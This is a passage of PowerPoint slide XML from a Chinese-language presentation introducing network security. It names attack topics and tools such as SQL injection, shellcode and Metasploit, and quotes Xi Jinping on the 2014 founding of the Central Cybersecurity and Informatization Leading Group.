            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2" descr="http://img3.duitang.com/uploads/item/201604/16/20160416231125_4wQ8P.thumb.700_0.jpe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15036" y="840166"/>
            <a:ext cx="3263938" cy="263222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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1651000"/>
            <a:ext cx="3888238" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>快上车，没时间解释了。老司机带你。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="2103938"/>
            <a:ext cx="5259772" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>核提权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="3380462"/>
            <a:ext cx="5259772" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLMAP Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kail Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>搜索引擎：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un/Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="398292322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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993900" y="1549400"/>
            <a:ext cx="8597900" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个人总结：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全是指网络和系统在内的软硬件免收意外的攻击和破坏，保证系统数据的完整性。（正确定，有效性，相容性）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2" descr="http://img4.duitang.com/uploads/item/201608/12/20160812101003_EdkJT.thumb.700_0.jpe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93900" y="3410635"/>
            <a:ext cx="2219325" cy="22193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4465333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57375" y="631487"/>
            <a:ext cx="2627642" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【2】</a:t>
            </a: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网络安全的背景：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3342713" y="1275941"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日揭开了中国信息化的新篇章</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021496" y="1964703"/>
            <a:ext cx="8919117" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日成为一个值得纪念的日子，中央网络安全和信息化领导小组宣告成立。</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）这是十三届三种全会以来继中央全面深化改革领导小组，中央国家安全委员会之后，中央在现有的架构外新设立的第三个“超级机构”。规格之大，力度之大，前所未有。。。。。。</a:t>
            </a:r>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）中央网络安全和信息化领导小组宣告成立和中共中央总书记，国家主席，中央军委主席习近平亲自担任组长，再次体现了中国全面深化改革，加强顶层设计的意志。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134750" y="3879498"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>络安全和信息化是当今世界之大势</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021496" y="4521902"/>
            <a:ext cx="8919117" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>习近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>平指出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）当今世界，信息技术革命日新月异，对国际政治，经济，文化，社会，军事等领域产生了深刻影响。深化了人们的正产和生活方式。</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）我国正处于这个网络大潮之中，受到的影响越来越深，网络走进千家万户，网名数量世界第一。</a:t>
            </a:r>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）同时也看到，我们在自主创新方面还相对落后，区域城乡差距比较明显，特别是人均带宽与国家先进水平相差较大，互联网发展瓶颈较为突出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154829" y="1964703"/>
            <a:ext cx="2866667" cy="4588524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="176227587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57375" y="631487"/>
            <a:ext cx="2031325" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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网络安全的背景：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="1048845"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>络安全和信息化是一体之翼，驱动之双轮</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="1765300"/>
            <a:ext cx="9013825" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>习近</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>平强调指出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）网络安全和信息化对一个国家很多领域都是牵一发而动全身，要认清我们面临的形式和任务。因势而谋，应势而动，顺势而为。</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）网络安全和信息化是一体之翼，驱动之双轮，必须统一谋划，统一部署，统一推进，统一实施。</a:t>
            </a:r>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）做好网络安全和信息化工作，要处理好安全和发展的关系，做到协调一致，齐头并进，以安全保发展，以发展促安全，努力建久之势，成长治之业。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="4236080"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>新时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>期网络安全赋予了更加深刻与广泛的内涵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="5137201"/>
            <a:ext cx="9013825" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）在不同时期，对网络安全有过不同的称谓和解释，其内涵在不断的深化，外延在不断的扩展。</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）当前我们关注的网络安全包括：意识形态安全，数据安全，技术安全，应用安全，资本安全，渠道安全等方面，其中涉及网络安全防护的对象和手段途径。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="108125508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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="631487"/>
            <a:ext cx="2031325" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络安全的背景：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="1510510"/>
            <a:ext cx="8597900" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>治安全是头等大事，基础网络和重要系统安全是重中之重</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
